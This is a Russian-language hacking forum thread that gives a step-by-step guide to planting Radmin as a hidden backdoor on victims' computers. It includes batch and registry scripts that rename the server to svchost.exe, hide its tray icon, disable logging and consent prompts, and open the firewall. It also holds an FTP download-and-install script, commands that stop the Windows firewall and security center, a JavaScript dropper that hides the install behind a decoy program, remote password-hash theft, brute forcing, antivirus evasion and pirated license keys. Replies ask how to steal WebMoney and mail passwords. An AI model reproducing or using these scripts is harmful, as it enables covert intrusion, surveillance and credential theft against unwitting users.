Intro

Помниться, летом уже прошедшего года, появилось вполне здоровое желание потренироваться в области троян-хака и возыметь определенную власть в местной локалке. Начились раскопки тырнета на предмет осваивания современных троев. (Кстати, кто там искал пинча? http://dkcs.void.ru/index.php?module=soft&page=troyans) . Именно тогда я заинтересовался радмином, а чуть позже узнал, что наш администратор именно с его помощью помогает бедным юзверям в их лам-делах. Какое совпадение =]

Как раз имено в то время в интернете начали появляться мануалы по установке\взлому радмина.
Просмотрев всё, что выплюнуло три поисковика, удалось собрать недетский хелп http://sec-123.narod.ru/radmin/1.rar

Запомните, порой всё что вам надо, делает сам разработчик. Я не раз убеждался в этом.
Поэтому READ THE FACKING MANUAL, мля !!! Где я и нашел практически всё, что нужно.
Дополнительная инфа из поисковиков добавило кучу вкусностей к пресному ману разработчика.

Почему именно Радмин?

1. Есть телнет, файловый менеджер, наблюдение и контроль за раб.столом, вкл\выкл компа.
2. Не палиться Касперским. НО УЧТИТЕ, что НОД его палит!!!
3. Возможность скрытой установки из консоли и малая палевность в системе.
4. Вобщем-то малый обём(не пинч конечно, но пайдёт)
5. Подержка прокси соединения на аналогичный радмин сервер(если ломать чужой радмин сервер).

Мы будем рассматривать версии от 2.0 до 2.2; они впринципе идентичные. Проги сами найдёте.
Привожу скучные коменты:

2.0
Serial_key: 08le-2jg4MggTuKc8bRD8VVC4O9107Hz1p7qkNUBRsGES4OdBDAnftk +ki2pQZHmM7lhysVBux8HE7udeSR0D1E0

2.1
Serial_key: 08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA 6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23

2.2
Serial_key: 08mi6OFGZ7xOssk3ECduXquHrrfBQksiZK0BHfuF17GAXvJybP iTRTCm7tsnRkyGTs-VSDTEzQjAe7BtlsguDiq1

Радмин контролирует правильность и безопасность настройки серверной части программы. Radmin Server 2.2 не позволяет задать пустой пароль.
Интеллекуальная защита от подбора пароля и DoS-атак. В версии 2.2 добавлены такие меры защиты, как анти-хакерская задержка, блокирование подозрительных IP-адресов, и т. д

3.0
Текстовый чат
Голосовой чат

По поводу совметимости версий - главное, чтобы клиент(вы с него конектитесь) был не старее сервера(его вы имеете =] ).
В качестве клиента советую юзать 3-ю версию(есть сканер порта+иконки типа файла в фаловом менеджере, имхо вери удобно).
Я использую по сей день 2.0 сервак. Просто переделывать всё, что забацал на нём под другие версии просто влом =]

Все операции приведны для 2.0 сервера.
===============Скрытая Установка==================
+++++Введение++++++
Допустим, вы хакнули систему сплоитом(MS09-039_RPC-3, ms04-011, и др.) и смотрите на консоль с правами System.
Загрузим и запустим ниже рассмотренные файлы.

Для работоспобности серверной части достаточно трёх файлов:
r_server.exe - сам сервак
AdmDll.dll - необходимая длл
raddrv.dll - длл видео-захвата(без неё будет пахать всё, кроме удалённого раб.стола)

Между прочим, если просто стартануть сервак без всякой установки, он заработает!!! Вход без пароля.
Однако, тут же палит себя в трее. Чтобы этого не случилось, необходимо прописаться в реестре

Вот список ключей в реестре:
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters]
"NTAuthEnabled" - авторизация по юзеру (0-входит любой)
"Parameter" - пароль
"DisableTrayIcon" - 0 - без иконки в трее
"Port" - (стандартный порт сервера 4899)
"EnableLogFile" - 0 - отключено ведение логов
"LogFilePath" - пкть к логфайлу
"FilterIp" - фильтр айпишников.
"AskUser" - 0 - не спрашивать у юзверя разрешение на взлом =]

Сам же сервер автогрузиться как служба.

+++++Настройки скриптов.+++++
Самый кайф в том, что сервак может запускаться из ЛЮБОГО места (хоть из C:\RECYCLER), лишь бы там же были AdmDll.dll и raddrv.dll.
И назвать его можно как угодно. Переименуем r_server.exe в svchost.exe .

Путём проб и ошибок были составлены следующие скриптики: http://sec-123.narod.ru/radmin/4.rar

111.bat - автозапуск всего безобразия.
Сначала в правила встроенного в ХР фаервола добавляеться новое правило.
Затем извлекаються все записи из реестра в 123.reg про Радмин, если он был уже установлен.
Происходит автокопирование в системную папку(например, C:\Windows\).
Установки радмина обновляються на ваши(два варианта под 2000 и ХР)
Установка и запуск сервера.


@echo off
echo FATAL ERROR! PLEASE, WAIT TO CONTINUE...
netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE
reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"
reg import 111.reg
regedit /s 111.reg
"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start


111.reg
Здесь в параметрах зашиты следующие установки:
- вход с любого айпи
- пароль 123456789
- не показывать иконку в трее
- порт 4899
- не логировать
- не спрашивать разрешение на конект
- прописка лицензии для вечной работы =]


Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplis t]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce, 1a
"DisableTrayIcon"=hex:01,00,00,00
"Port"=hex:23,13,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType]
"Data"=hex:95,f3,0b,13,44,c0,10,74,7b,2e,83,2c,f5,89,e4, b9,49,c8,49,00,1c,eb,\
18,64,87,46,c5,78,59,73,2a,6a,13,72,53,9e,e4,f5,74 ,94,4f,49,42,46,f7,ab,05,\
1f,55,24,72,79,e9,85,c8,8a,1e,5e,e3,d8,35,70,06,28



===================№3 Взлом Сервера Радмина==================
Раскажу про способы.

++++Доступ к реестру++++
У многих компов разрешен доступ на чтение реестра!
Юзать надо так через командную строку.
Для хелпа наберите
reg /? - для ХР
regedit /? - для 2000

REG COPY \\ZODIAC\HKLM\SYSTEM\RAdmin HKLM\Software\Hacker
Копирует все параметры раздела RAdmin с компьютера ZODIAC
в раздел HKLM\Software\Hacker на локальном компьютере.

Затем лезем к себе в реестр и копируем значение в *.txt файл.
HKLM\Software\Hacker\v2.0\Server\Parameters]
"Parameter"=??????????????????????????????????

Берем PasswordPRO, скармливаем ей наш txt-файл с паролем, выбирая алгоритм RADMIN, и ждём результата.

Кстати, если изменить пароль в реестре, изменение подействует без всяких перезагрузок сервера радмина.
И при следующем коннекте он будет уже действителен. Текущая сессия не прервётся при смене пароля.

+++++Подбор пароля++++
В инете мне попадалось на глаза всего два публичных радмин-брута.
Первый был на народе, но мне не посчастливилось его скачать - сайт прикрыли.
Есть второй вариант, по хуже, на зато рабочий. Выполнен на *.vbs скрипте.
Скорость фиговая, но для автоматизации перебора по словарю годиться.
Помните, что в 2.2 версии есть защитные механизмы от брута...
http://sec-123.narod.ru/radmin/2.rar

+++++Впаривание Радмина++++
Самый лучший способ - взять выше выложенные скрипты, оформить инструкции,
упаковать инсталлером с какой-нить прогой и впарить ламеру.

Вот, как это сделать без инсталлера.
Можно невидимо пустить bat-файл через ява-скрипт:
_README.js

var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("111.bat",0);

var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("screenseiver.scr",1);

Запуститься сначала установка радмина, а за ней какая-нить типа полезная прога.
http://sec-123.narod.ru/radmin/6.rar

+++++Как не спалиться++++
Если вы подобрали пароль на уже установленный радмин, советую заменить r_server.exe на пропатченную версию.
Дело в том, что иконка в трее при отсутствии соединений СИНЯЯ, а при наличии таковых - КРАСНАЯ.
Достаточно каким-либо редактором иконок поменять Красную на Синюю... http://sec-123.narod.ru/radmin/5.rar
Учтите, иногда перезапуск сервиса радмина возможен только после перезагрузки системы. Такой вот глюк.
Также, убедитесь в отсутствии логирования в реестре(см. выше).
Для конспирации при впаривании можно зашифровать батник, или сконвертировать его в *.com (http://sec-123.narod.ru/radmin/3.rar)

================================================

Ничего не забыл?...

Кстати, совсем недавно, в выпуске Мазафаки под новый год была вот эта статья, написанная eXp.l0ziv.

Привожу её содержание. Важным достоинством считаю выполнение опереций с реестром без переходного рег-файла, напрямую из командной строки. Учтите, некоторые фичи работают лишь для радмина выше 2.1.

0х01. Интро
-----------

Последнее время участились просьбы на форумах о помощи закрепиться на Windows-машинах, да и в ICQ почему-то спрашивают вопросы именно такого рода...и именно про RAdmin. Поэтому, чтобы не обьяснять каждому что к чему, я решил об этом написать...
Итак... Совершенно не важно как вы получили доступ к машине с ОС Windows (локально или удалённым сплойтом), важно что у вас есть потребность в последующем использовать ресурсы и/или данные этой машины. Способов оставить себе лазейку множество... от бинда порта до установки троянов. Один из многих - это установка RAdmin. Приступим.

0х02. Теория
------------

Да-да... именно теория, так как выяснилось что многие люди незнают коммандной оболочки и что такое *.bat-файлы. Из данной области надо хотя бы знать как пользоваться FTP через cmd.exe =) Придумывать ничего не надо, вот хэлп:

Синтаксис:

ftp [-v] [-d] [-i] [-n] [-g] [-s:имя_файла] [-a] [-w:размер] [-A] [Ведомый компьютер]

... из параметров нам понадобится только:

-v = Запрещает вывод на экран ответа FTP-сервера;
-n = Запрещает автоматический вход в систему в ходе начального подключения;
-s:имя_файла = Указывает текстовый файл с ftp-командами.
Эти команды выполняются автоматически после запуска команды ftp. ;

Также советую почитать справку по коммандам - REG ADD, netsh firewall, net stop/start, чтобы хотябы понимать, что мы будем делать далее...

0х03. Процесс установки
-----------------------

Пользоваться будем RAdmin'ом 2.1 Из все кучи файлов нам нужны только:
r_server.exe, AdmDll.dll, raddrv.dll. Вот что написано в хэлпе:

Usage: r_server.exe options

Options:

/setup - show window dialog box with setup settings (install,remove,port,pass)
/pass:xxxxx - specify a password
/port:xxxxx - specify a port number
/install - install service (Win95/98 or WinNT) and driver (WinNT)
/uninstall - uninstall service and driver, if present
/save - save pass & port to the defau lt program settings in the registry if you not
specify port or\and pass when use this option, default port or\and empty
password will be saved.
/silence - dont show message boxes,in /install, /uninstall or /save commands.
/unregister - delete an already entered key for Radmin.
/? - this help screen

Note, that port and password specified in the command prompt,
always overrides default settings from the registry.

Отсюда видно, что для установки RAdmin'a в коммандной строке необходимо набрать:

CMD>r_server.exe /install /silence
CMD>r_server.exe /port:порт /pass:пароль /save /silence

Всё... RAdmin установлен и его можно использовать. НО! На данном этапе он слишком заметен
из-за иконки в трэе. Для того чтобы её убрать необходимо добавить в реестр несколько
ключей:

В [HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters] - ключ "DisableTrayIcon", тип - REG_BINARY,
значение - 00000001.
В [HKLM\SYSTEM\CurrentControlSet\Services\r_server] - ключ "DisplayName", тип - REG_SZ,
значение - "Service Host Controller".

Сделать это можно коммандами:

CMD>REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
CMD>REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f

0х04. Автоматизация
-------------------

Всё это, конечно, хорошо, но занимает некоторое время. Поэтому было бы неплохо,
сократить количество действий. Для этого напишем *.bat-файл примерно такого содержания:

@echo off
echo open [Adress_FTP]>ra.pif // [Adress_FTP] - адресс FTP-сервера
echo [user] [pass] a>>ra.pif // [user] - логин, [pass] - пароль
echo binary>>ra.pif
echo GET AdmDll.dll [Path]\AdmDll.dll>>ra.pif //
echo GET raddrv.dll [Path]\raddrv.dll>>ra.pif // [Path] - путь к файлам
echo GET r_server.exe [Path]\r_server.exe>>ra.pif //
echo bye>>ra.pif
ftp -v -n -s:ra.pif
c:\windows\r_server.exe /install /silence
c:\windows\r_server.exe /pass:123 /save /silence
REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f
c:\windows\r_server.exe /stop
c:\windows\r_server.exe /start

0х05. Утилизация файрвола
-------------------------

Часто бывает так, что на машине включён фаерволл (пусть даже стандартный) и он нам мешает. В случае с Windows у нас есть 2 пути: отключть его либо добавить необходимые правила. Рассмотрим каждый из них в отдельности.
Итак, как же отключить стандартный фаерволл? В ОС Windows фаерволом является - служба "Брандмауэр Windows/Общий доступ к Интернету (ICS)" или по-простому - sharedaccess.
Останавливается он командой:

CMD>NET STOP "Брандмауэр Windows/Общий доступ к Интернету (ICS)"
либо
CMD>NET STOP sharedaccess

но тут есть свои нюансы... при попытке отключения этой службы - пользователь получит сообщение с предупреждением о небезопасности этого действия. Это неприемлемо! Следовательно нужно сделать так чтобы этого не произошло. За выдачу таких сообщений отвечает служба "Центр обеспечения безопасности" (по-простому - wscsvc). С ледовательно перед отключением фаера, необходимо отключить эту службу одной из двух комманд:

CMD>NET STOP "Центр обеспечения безопасности"
либо
CMD>NET STOP wscsvc

Теперь перейдём к более элегантному методу - добавлению необходимого правила для фаера. В Win XP SP2 модифицировать и добавлять правила можно коммандой netsh firewall. Вот небольшая справка:
Группа
Команда
Описание

Добавление конфигурации
netsh firewall add allowedprogram
netsh firewall add portopening Добавление разрешенной программы в брандмауэр Windows. Добавление конфигурации порта в
брандмауэр Windows

Удаление
netsh firewall delete allowedprogram
netsh firewall delete portopening Удаление разрешенной конфигурации
программы из брандмауэра Windows
Удаление конфигурации порта из
брандмауэра Windows

добавить правило можно одной коммандой:

CMD>netsh firewall add allowedprogram C:\Progra~1\Radmin\r_server.exe systerm enable
либо
CMD>netsh firewall add portopening TCP 4899 systerm
где systerm - просто назване правила.

Если же на машине установлен не SP2, то придётся поработать добавляя нужные ключи к реестру уже знакомой коммандой REG ADD.

Каким бы способом вы не отключали брандмауэр - удобнее дописать все необходимые комманды в уже созданый в *.bat-файл...

0х06. Ауттро
------------

Несмотря на лёгкость и элегантность этого метода, у него всё же есть несколько минусов, а именно:

- открытый порт 4899. Спрятать средствами RAdmin'a его нельзя. Можно только поменять, добавив при установке ключ /port:[порт];
- Добавляется новый сервис (служба);
- Добавляются записи в реестр;
- Заметен для антивирусов;
- Светиться в процессах. Устраняется путём переименовывания exe-шника во что-нибуть неприметное,
например - svhost.exe =)
- некоторые комманды доступны только в WinXP SP2.

0х07. Ссылки
------------

- http://www.cyberlords.net - Оригинал статьи
- http://www.cyberlords.net/... - сканер радмин серверов с пустым паролем
- http://www.blacklogic.net/ - Анализ системы удаленного контроля NTRootKit, E-Zine FH0, 0x01
- http://www.famatech.com/support/faq.php - FAQ, офф-сайт RAdmin'a
- http://www.radmin.com - офф-сайт RAdmin'a
- http://www.rootkit.com
- http://www.ucl.ac.uk/cert/win_intrusion.pdf
- http://www1.umn.edu/oit/img/assets/5630/WindowsRootkits.pdf - презентация с конференции Defcon
- http://www.windowsecurity.com/articles/Hidden_Backdoors_Trojan_Horses_and_Rootkit_Tools_i n_a_Windows_Environment.html

Автор: eXp.l0ziv

Испытывал трудности с Нодом. После некоторого секса удалось закриптовать файлы. Вот криптованый радмин v2.0 (http://sec-123.narod.ru/radmin/7.rar) ). Не палиться Нодом Nod32 2.50.25 с базами от 10-го февраля. Касперский со стандартными базами не реагирует, с расширенными палит.

В процессе выяснилось - Нод спотыкается о древнейшие грабли 2002 года, на которые попадался Касперский. При смене точки начала загрузки (прога topo12.exe) трояна - Нод перестаёт его видеть =]

Испытывал трудности с Нодом. После некоторого секса удалось закриптовать файлы. Вот криптованый радмин v2.0 (http://sec-123.narod.ru/radmin/7.rar) ). Не палиться Нодом Nod32 2.50.25 с базами от 10-го февраля. Касперский со стандартными базами не реагирует, с расширенными палит.

В процессе выяснилось - Нод спотыкается о древнейшие грабли 2002 года, на которые попадался Касперский. При смене точки начала загрузки (прога topo12.exe) трояна - Нод перестаёт его видеть =]
Спасибо, теперь плохие дяди будут жить плохо... Как и положено.
+ к репе. ;)

Молодец хорошее Faq!

Согласен, информативно. Теперь будет ссылка что надо даваь при вопросах "че такое радмин икак его использовать"

Radmin - это тема!!!
Скину своему преподу по проге... :)

МегаРеспект за МегаСтатью =), +

Elect молодец. :)

Отлично :)

Даешь RAdmin! =)
У меня вопрос... Я смотрел видео от Elekt, тама в XSpider профилях есть DefaultOff у меня такого нету, есть Default, но тогда пишет
Сканирование хоста не производилось, так как хост не отвечает на ICMP запросы. Чтобы выполнить сканирование необходимо выбрать соответствующий профиль (например: "DefaultOff.prf").
И чё мне делать? =(

Сменить профиль сканирования. На всякий случай вот несколько хороших доработанных профилей. Их в более старших версиях разработчики просто убрали, типа защита от дурака.

http://sec-123.narod.ru/Profiles.rar
http://rapidshare.de/files/14864179/Profiles.rar.html

Ага... Пасибо!

Не понимаю... Просканировал 75 IP адресов, и ничего, неужели у всех файрволл?! Или я что-то не то сканирую... 445 / tcp - Это? :confused:

Вопрос по радмину:есть лок машина доступ туда есть полный , как шары, так телнет , ну в общем что угодно, кроме физического доступа!
Как удобнее сделать так чтобы можно было закидывать радмина под svchost.exe запускать его удаленно так чтобы он не жил в трее, работать через внешние айпи с этой машины(машина эта имеет реал айпи) далее после завершения работы из внешних айпи, закрывать радмина !
Как это проще сделать ? через телнет я смогу запустить радмина, и добавить ключи а реест , которые вынесут его из трея?

Ещё вопрос сможет ли радмин вырубить самого себя, если я подрубаюсь на raserver.exe и запускаю cmd kskill raserver.exe !
Сможет ли радмин снять самого себя, или выполнить эту cmd команду?

Т.е. ,если я удаленно с внешнего IP подрубаюсь на IP с радмином, работаю , а потом снимаю из процессов радмина сервера, снимаю с самого радмина?
Получиться ли так?


через tskill r_server не получается, получается снять с 3-х кнопок, но если подключаться через телнет с удаленно IP , то 3 кнопки не катируются :(
как можно его вынести?

Про запуск из телнета и скрытие из трея читай выше.

Если б ты удосужился скачать вот ЭТОТ (http://sec-123.narod.ru/radmin/4.rar) архивчик, то обнаружил в нём DEL.bat . Кажется я его оставлял там при архивации.

Поясню, вырубить радмин можно двумя способами.

Способ_1. Цивилизованный.
Радмин предусматривает остановку своего сервиса командой:
C:\Windows\r_server.exe /stop

Способ_2. Универсальный.
Дёшево и сердито.
taskkill /IM r_server.exe /F /T
или предварительно посмотрев PID радмина командой
tasklist
например, пид равен 1234, тогда пишем
taskkill /PID 1234 /F /T

Если ты это делаешь из под консоли радмина - связь должна характерно отрубиться =]

Elektтопик давно, скачал, но проблема в том, что радмина закинул, допусим внес изменения в реестр, но веть для того чтобы он заработал нужно ресет машины, или же ресет выполняется только после первого заселения?
Если заселять только
AdmDll.dll
raddrv.dll
svchost.exe
Запустив svchost.exe , он будет запущен от имени учетной записи, как его снять понял , спасибо за подсказку!

А мне скажите кто-нибудь =*( Какой порт надо сканировать? 445 / tcp?

Ладно... На тупые вопросы не отвечаете :(

Ponchik помоему радмину всё равно на каком порту висеть главное выше 5001 и ниже 10000 и чтобы порт был не занят ничем, может я ошибаюсь, исправьте тогда!

Полезные ссылки по сабжу:

Как выключить монитор через командную строку (http://forum.antichat.ru/thread14894.html)

Взлом протокола Радмина. Помогаем автору (http://forum.antichat.ru/thread15272-Radmin.html)

Нужэн брут под radmin (http://forum.antichat.ru/thread15107-Radmin.html)

Ставим radmin через win shell (http://forum.antichat.ru/thread12582-Radmin.html)

Борьба с админом, а точнее с R_admin (http://forum.antichat.ru/thread10616-Radmin.html)

=================================
Лучше бы закрыть тему.

Подскажите, пожалуйста, что надо добавить в рег файл, что бы радмин запускался при загрузки винда.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\r_server]
"Type"=dword:00000110
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):22,00,25,00,53,00,79,00,73,00,74,00,65,00, 6d,00,52,00,6f,00,6f,00,74,00,25,00,5c,00,73,00,79 ,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,0 0,76,00,41,04,68,00,6f,00,73,00,74,00,2e,00,65,00, 78,00,65,00,22,00,20,00,2f,00,73,00,65,00,72,00,76 ,00,69,00,63,00,65,00,00,00,00,00
"DisplayName"="Remote Administrator Service"
"ObjectName"="LocalSystem"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\r_server\Security]
"Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00, 00,30,00,00,00,02,00,1c,00,01,00,00,00,02,80,14,00 ,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,0 2,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01, 01,00,00,00,00,00,05,12,00,00,00,00,00,18,00,ff,01 ,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,0 0,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00, 05,0b,00,00,00,00,00,18,00,fd,01,02,00,01,02,00,00 ,00,00,00,05,20,00,00,00,23,02,00,00,01,01,00,00,0 0,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12, 00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\r_server\Enum]
"0"="Root\\LEGACY_R_SERVER\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001

Я вот закинул РАдмина на комп... удаленный доступ... и т.д. но меня интересует как скамуниздить пассы от ВебМани, от Мыля, Аси и т.д.?

и еще как можно полазить по сетки, если она есть?

Запусти у него нужные программы и будет тебе счатсье, от вебмани тебе потребуются еще ключи (:
Вроде всЁ )

Зверская статья.
ОТЛИЧНО!!!

r†']Запусти у него нужные программы и будет тебе счатсье, от вебмани тебе потребуются еще ключи (:
Вроде всЁ )
А поточнее о прогах можно?

Возникла проблема, все сделал как здесь описано, но при запуске viewera при подключении к хосту возникает проблема.
короче коннектюсь
ввожу пароль, а дальше выскакивает окошко loading initial screen и все пропадает и ноль эмоций
у меня система windows 2003 sp1
у удаленного компа windows 2003

при подключении к другим компам с win 2000 или win xp все пашет.

подскажите плз, в чем дело, может это не работает для win 2003?

Как оказалось этот faq бесполезен для windows 2003 server, а так как эту версию в основном используют админы, то лучше научиться использовать удаленный рабочий стол.
При подключении к radmin установленный на другой машине не работает видео драйвер, а только телнет.
ну а если вы смогли через шелл залить софт тогда вам telnet нафиг не нужен.

короче статья мусор и старье.

автор почитай офиициальный форум radmin, столько ошибок и несуразностей наверное есть только у IE.

Наконец вышла третья более менее рабочая ветка Радмина.


Серверная часть.

До этого сервак бетки разрешпл лиш чат и голосовое общение.
Теперь и весь основной функционал работает.

Советую все качнуть пока ещё бесплатную 3-бетту, а то потом будете лицензию искать.

Да, под 2003 виндой в старых версиях не работал раб.стол, но и без этого жить можно, вы же не фильм залезли посмотреть =)
Теперь добавлена поддержка рабстола в Win2003 на уровне драйвера:
"Supports Windows 95/98/Me/NT4/2000/XP/2003, full Windows XP compatibility"
...а в "Диспетчере Устройств" у вас будет почётно красоваться "Radmin Mirror Driver V3" рядом с видюхой и тюнером.

Пока сервер не палится антивирусами :)

Теперь о неприятном:
- иконку из трея убрать просто так нельзя.
Видимо, это особенность этой версии и возможно, что позже всё вернут.
В настройках нет такого пункта. Но даже после прямой прописки параметра в реестре сервер просто отказывается запускаться.
Редактирование иконки сервера на бесцветную также не даёт желаемого результата(встроена какая-то проверка целостности).
- Установку из консоли убрали, потому просто так нельзя его поднять из командной строки, хотя управлять по прежнему можно(/start /stop).
Нужно для начала прописать драйвер в системе через реестр(Название сервиса "Radmin Server V3"), тогда он появится(внимание, потребуется перезагрузка).
Помните, что теперь ВСЕ параметры в реестре шифруются, потому нужно заранее сконфигуроровать сервак у себя, а затем сделать экспорт из реестра и внести его в реестр жертвы.
У меня в реестре за службу третьего радмина отвечают : http://sec-123.narod.ru/radmin/Radmin_3.rar
Для работоспособности серверу требуется несколько файлов. Поддержку каждого модуля реализует отдельная библиотека.
Рабочая директория: "C:\WINDOWS\system32\rserver30\"
В "C:\Program Files\Radmin Server 3.0" только деинсталятор.


Теперь о клиенте(вьювер).

Внимание! Вьювер они тоже обновили, причём старый третий вьювер не совместим с новым сервером.
Так что не ленитесь - закачать новый.
Как всегда, вьювер 3 совместим со всеми 2.х серверами радмина.

Незабывайте, что база контактов в 2.х вьюверах была в [HKEY_CURRENT_USER\Software\RAdmin\v2.0\Clients],
а в 3-ем вьювере она хранится "C:\Documents and Settings\username\Application Data\Radmin\radmin.rpb"
Это я к тому, что гуляя по чужой машине незабудьте проверить эти места - в хозяйстве пригодятся =)

Кстати, вьювером можно управлять из командной строки!
Только не знаю, зачем нужно такое извращение, разве что для написания авто-скриптов, например, для массового выключения парка копьютеров по окончании раб.дня. В хелпе найдёте ключи управления.

По поводу настроек сервера в реестре.
Идём в хелп - как, всегда всё что надо =)

IP filter settings:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Param eters\FilterIp
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\iplis t\

Show confirmation dialog option:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Param eters\AskUser

Sets default value of auto-answer:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Param eters\AutoAllow

Disable tray icon flag option:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Param eters\DisableTrayIcon

Logfile settings:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Param eters\EnableLogFile
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Param eters\LogFilePath

Password for Radmin server (encrypted):
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Param eters\Parameter

Port number settings:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Param eters\Port

Enable NT security flag:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Param eters\NTAuthEnabled

User list for NT security support:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Users \

Disallows changes:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Param eters\DisallowChanges

Disables beep:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Param eters\DisableBeep

Disables various connection types:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Param eters\DisableRedirect
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Param eters\DisableScreen
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Param eters\DisableView
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Param eters\DisableTelnet
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Param eters\DisableFile

License key:
HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType\ Data


Uninstallation:

To uninstall execute:
%windir%\system32\r_server.exe /stop
%windir%\system32\r_server.exe /uninstall /silence
Delete all Radmin files.

Да, кстати, насчёт Remote Desktop.

Подробное описание здесь:
ХР-АДМИНИСТРАЦИЯ - удаленный помощник WinXP (http://www.xakep.ru/magazine/xs/025/018/1.asp)

Замечу, что для Win2003 не требуется завершение сеанса активного пользователя! :)
У вас появляется раб стол юзера, но при этом мышка и клава у вас "своя" :)
Таким образом Вы НИЧЕМ не выдаёте своё присутствие, в отличие от управления Радмином.

Вот параметры в реестре, активирующие Remote Desktop (без перезагрузки).

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Te rminal Server]

"fAllowToGetHelp"=dword:00000001
"fDenyTSConnections"=dword:00000000

Да, должна быть запущена "Cлужба терминалов" (в Win2003 запущена по дефаулту, в ХР - нет)
Посмотреть список запущенных служб так:
net start
Если нет "Cлужба терминалов" - запустить так:
net start RdpDr

А он неведёт некаких логов..? Есть вазможность проверить после работи..,с какого ип конектилисй.., и так далее? Или ето более мениее безопасно..?

А он неведёт некаких логов..? Есть вазможность проверить после работи..,с какого ип конектилисй.., и так далее? Или ето более мениее безопасно..?

Если стоит соответствующая галка в настройках radmin'a - то логи ведуться.

Яфна, а как проверить она тиам стоти или нет..?

Яфна, а как проверить она тиам стоти или нет..?


Смотри первую страничку топика

"EnableLogFile" - 0 - отключено ведение логов
"EnableLogFile" - 0 - отключено ведение логов
"LogFilePath" - путь к логфайлу

Если удаленное хочешь узнать, и уже есть доступ к машинке, то только посмотреть значение этого ключа в ресстре.

там в первом посте говорили про програму PasswordPro и хеч ею паролей для реадмина. вопрос.
у меня в списке нету вида хеча \"RADMIN\" где взять?

У меня важный вопрос: Я пошлю радмина челу, с которым, кроме инета, связи нет!!! Нет никакой между нами локалки! И будет работать?

проблема с регистрацией. вставляю ключ куда нужно нажимаю ок. а мне нифига. в чем дело?

Такая же проблема, ни один из найденых ключей не работает, что это за хрень такая ???

cheb, dll в какой дистрибутив ключи вставляете, который с оф сайта скачали?

похоже что ключи которые вы нашли давно забанены... ищите варезный дистрибутив вместе с ключами.

да нет. не с офиц. сайта било скачено. может подкинеш ключик то????


вот еще вопрос. что тут нужно заменить ???


111.reg
Здесь в параметрах зашиты следующие установки:
- вход с любого айпи
- пароль 123456789
- не показывать иконку в трее
- порт 4899
- не логировать
- не спрашивать разрешение на конект
